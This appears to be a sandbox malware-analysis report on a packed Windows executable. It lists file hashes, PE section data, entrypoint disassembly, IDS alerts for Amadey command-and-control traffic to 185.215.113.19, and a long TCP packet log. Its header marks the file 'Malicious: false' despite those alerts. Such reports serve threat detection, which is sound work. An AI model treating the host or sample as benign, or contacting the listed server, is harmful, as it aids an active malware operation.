Malicious:	false
Reputation:	low
Preview:	......G3.d.A.....-j.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................2.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.955496476230148
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	11NdzR12PS.exe
File size:	1'921'536 bytes
MD5:	291a8d56e77cb07be1a6b4308d51650b
SHA1:	310e47b223740de2989f5c8f4b12d294e6568a2c
SHA256:	fda0fc105ffd6faae12d08c243fe684be8c69696bd654d733f5caf487b59baae
SHA512:	7f764a84720ddd1b2792747797befb2272eb33dc4ce141c78bef87356e7c861451588678e2a041084db3b96a8a23b191d864f93e66f8ffefe368fbb494f0165d
SSDEEP:	49152:N4T6hIyXZjUqy6rCPkriwTB3/4z/vVaHAZT:+T6hI9DQi64z/vs
TLSH:	DF95336754F092B1D49235390D2FFA52EB389BDF507E62E8E87F8216A57835E7390320
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8c2000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FF340E54EEAh
wrmsr
sbb eax, 00000000h
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
inc ecx
push bx
dec esi
dec ebp
das
xor al, 36h
dec edi
bound ecx, dword ptr [ecx+4Ah]
dec edx
insd
push edi
dec eax
dec eax
jbe 00007FF340E54F52h
push esi
dec edx
popad
je 00007FF340E54F4Bh
push edx
dec esi
jc 00007FF340E54F5Ah
cmp byte ptr [ebx], dh
push edx
jns 00007FF340E54F27h
or eax, 49674B0Ah
cmp byte ptr [edi+43h], dl
jnc 00007FF340E54F2Dh
bound eax, dword ptr [ecx+30h]
pop edx
inc edi
push esp
push 43473163h
aaa
push edi
dec esi
xor ebp, dword ptr [ebx+59h]
push edi
push edx
pop eax
je 00007FF340E54F37h
xor dl, byte ptr [ebx+2Bh]
popad
jne 00007FF340E54F2Ch
dec eax
dec ebp
jo 00007FF340E54F23h
xor dword ptr [edi], esi
inc esp
dec edx
dec ebp
jns 00007FF340E54F30h
insd
jnc 00007FF340E54F50h
aaa
inc esp
inc ecx
inc ebx
xor dl, byte ptr [ecx+4Bh]
inc edx
inc esp
bound esi, dword ptr [ebx]
or eax, 63656B0Ah
jno 00007FF340E54F38h
push edx
insb
js 00007FF340E54F51h
outsb
inc ecx
jno 00007FF340E54F32h
push ebp
inc esi
pop edx
xor eax, dword ptr [ebx+36h]
push eax
aaa
imul edx, dword ptr [ebx+58h], 4Eh
aaa
inc ebx
jbe 00007FF340E54F2Ch
dec ebx
js 00007FF340E54F23h
jne 00007FF340E54F11h
push esp
inc bp
outsb
inc edx
popad
dec ebx
insd
dec ebp
inc edi
xor dword ptr [ecx+36h], esp
push 0000004Bh
sub eax, dword ptr [ebp+33h]
jp 00007FF340E54F3Ch
dec edx
xor bh, byte ptr [edx+56h]
bound eax, dword ptr [edi+66h]
jbe 00007FF340E54F1Ah
dec eax
or eax, 506C720Ah
aaa
xor dword ptr fs:[ebp+62h], ecx
arpl word ptr [esi], si
inc esp
jo 00007FF340E54F53h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c0560	0x10	wokugkrf
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4c0510	0x18	wokugkrf
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2dc00	5c6bf0b7c7f5078da88f9a2ae07806a8	False	0.9997064976092896	data	7.980756696745502	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	164c3d0e6ce4fc9b310b90a7bf557bef	False	0.576171875	data	4.558318256855509	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2b2000	0x200	88b76c495d8038c796b8e0691c5d6018	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wokugkrf	0x31d000	0x1a4000	0x1a3800	75e919d9b9d10ab906b93ec25c73dda5	False	0.9944071718563766	data	7.954605137442367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
csqdmnjl	0x4c1000	0x1000	0x600	0b4bdba7c484905c25c3b870cf5125ed	False	0.5638020833333334	data	5.003360902210379	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4c2000	0x3000	0x2200	d910be3f5401773e6f40462ecce812c4	False	0.3922334558823529	DOS executable (COM)	4.131489801965212	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4c0570	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-27T04:50:06.678835+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49739	80	192.168.2.4	185.215.113.19
2024-07-27T04:50:15.926387+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49746	80	192.168.2.4	185.215.113.19
2024-07-27T04:50:04.436087+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49737	80	192.168.2.4	185.215.113.19
2024-07-27T04:49:19.969599+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49730	52.165.165.26	192.168.2.4
2024-07-27T04:50:05.535513+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49738	80	192.168.2.4	185.215.113.19
2024-07-27T04:50:20.029073+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49749	80	192.168.2.4	185.215.113.19
2024-07-27T04:49:58.053817+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49736	52.165.165.26	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 04:50:03.418380022 CEST	49737	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:03.424717903 CEST	80	49737	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:03.424942970 CEST	49737	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:03.424983025 CEST	49737	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:03.430469990 CEST	80	49737	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:04.435867071 CEST	80	49737	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:04.436086893 CEST	49737	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:04.437208891 CEST	80	49737	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:04.437308073 CEST	49737	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:04.438379049 CEST	49737	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:04.443809986 CEST	80	49737	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:04.690713882 CEST	80	49737	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:04.691245079 CEST	49737	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:04.794495106 CEST	49737	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:04.794893026 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:04.799793959 CEST	80	49738	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:04.799856901 CEST	80	49737	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:04.799953938 CEST	49737	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:04.800107956 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:04.800107956 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:04.804903984 CEST	80	49738	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:05.535300016 CEST	80	49738	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:05.535512924 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:05.536300898 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:05.541755915 CEST	80	49738	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:05.780839920 CEST	80	49738	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:05.780942917 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:05.905524969 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:05.906097889 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:05.911147118 CEST	80	49738	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:05.911189079 CEST	80	49739	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:05.911251068 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:05.911268950 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:05.911653042 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:05.916574955 CEST	80	49739	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:06.678591013 CEST	80	49739	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:06.678834915 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:06.679553032 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:06.685216904 CEST	80	49739	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:07.275886059 CEST	80	49739	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:07.276369095 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:07.388221979 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:07.388566971 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:07.393886089 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:07.394129992 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:07.394228935 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:07.394474030 CEST	80	49739	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:07.394628048 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:07.399590969 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:08.162256956 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:08.162451029 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:08.163115978 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:08.168514967 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:09.382258892 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:09.382395983 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:09.382431030 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:09.382715940 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:09.382716894 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:09.497584105 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:09.497999907 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:09.503031969 CEST	80	49741	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:09.503134012 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:09.503314972 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:09.507145882 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:09.507237911 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:09.508161068 CEST	80	49741	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:10.278546095 CEST	80	49741	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:10.278765917 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:10.279540062 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:10.284920931 CEST	80	49741	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:10.531975985 CEST	80	49741	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:10.532161951 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:10.669365883 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:10.672514915 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:10.675065041 CEST	80	49741	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:10.675168037 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:10.677459002 CEST	80	49742	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:10.677700996 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:10.678642035 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:10.683685064 CEST	80	49742	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:11.412758112 CEST	80	49742	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:11.412821054 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:11.413577080 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:11.419301033 CEST	80	49742	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:11.660523891 CEST	80	49742	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:11.660886049 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:11.763428926 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:11.763784885 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:11.769326925 CEST	80	49742	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:11.769371986 CEST	80	49743	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:11.769537926 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:11.769587040 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:11.769718885 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:11.775171995 CEST	80	49743	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:12.537734032 CEST	80	49743	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:12.537847042 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:12.538479090 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:12.543351889 CEST	80	49743	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:12.790344000 CEST	80	49743	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:12.790601969 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:12.905525923 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:12.905832052 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:12.911456108 CEST	80	49743	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:12.911658049 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:12.912430048 CEST	80	49744	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:12.912592888 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:12.912672043 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:12.918082952 CEST	80	49744	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:13.665246010 CEST	80	49744	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:13.665512085 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:13.666126013 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:13.671324015 CEST	80	49744	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:13.915050983 CEST	80	49744	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:13.915112019 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:14.028786898 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:14.029047012 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:14.034578085 CEST	80	49744	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:14.034665108 CEST	80	49745	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:14.034739017 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:14.034778118 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:14.034913063 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:14.040126085 CEST	80	49745	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:14.781486034 CEST	80	49745	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:14.781919003 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:14.782449961 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:14.787828922 CEST	80	49745	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:15.029051065 CEST	80	49745	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:15.029470921 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:15.138698101 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:15.139075041 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:15.144527912 CEST	80	49746	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:15.144577026 CEST	80	49745	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:15.144747972 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:15.144942999 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:15.144942999 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:15.150194883 CEST	80	49746	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:15.926115036 CEST	80	49746	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:15.926387072 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:15.927194118 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:15.932284117 CEST	80	49746	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:16.907579899 CEST	80	49746	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:16.907705069 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:17.013215065 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:17.013607025 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:17.019074917 CEST	80	49747	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:17.019170046 CEST	80	49746	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:17.019243956 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:17.019299030 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:17.019382954 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:17.024609089 CEST	80	49747	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:17.773473978 CEST	80	49747	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:17.773926973 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:17.774467945 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:17.780124903 CEST	80	49747	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:18.023941994 CEST	80	49747	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:18.024010897 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:18.138326883 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:18.138668060 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:18.148523092 CEST	80	49748	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:18.149038076 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:18.149038076 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:18.154613972 CEST	80	49748	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:18.166368961 CEST	80	49747	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:18.166680098 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:18.919363022 CEST	80	49748	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:18.919830084 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:18.921818972 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:18.927139044 CEST	80	49748	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:19.171632051 CEST	80	49748	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:19.171766043 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:19.278733969 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:19.279191971 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:19.284354925 CEST	80	49749	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:19.284396887 CEST	80	49748	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:19.284439087 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:19.284467936 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:19.284646034 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:19.290431976 CEST	80	49749	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:20.028937101 CEST	80	49749	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:20.029073000 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:20.032079935 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:20.037504911 CEST	80	49749	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:20.315298080 CEST	80	49749	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:20.315393925 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:20.425595999 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:20.425843954 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:20.431013107 CEST	80	49750	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:20.431091070 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:20.431212902 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:20.431417942 CEST	80	49749	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:20.431472063 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:20.436232090 CEST	80	49750	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:21.179347038 CEST	80	49750	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:21.179425955 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:21.180248976 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:21.185583115 CEST	80	49750	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:21.438505888 CEST	80	49750	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:21.438841105 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:21.544967890 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:21.545444012 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:21.551064968 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:21.551105976 CEST	80	49750	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:21.551184893 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:21.551215887 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:21.551347971 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:21.556551933 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:22.318650007 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:22.318756104 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:22.323117971 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:22.329235077 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:22.575063944 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:22.575388908 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:22.685419083 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:22.685863018 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:22.691539049 CEST	80	49752	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:22.691780090 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:22.691823959 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:22.691999912 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:22.709281921 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:22.714860916 CEST	80	49752	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:23.451471090 CEST	80	49752	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:23.451929092 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:23.453860044 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:23.459378958 CEST	80	49752	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:23.703874111 CEST	80	49752	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:23.703984022 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:23.810537100 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:23.810933113 CEST	49753	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:23.816325903 CEST	80	49753	185.215.113.19	192.168.2.4
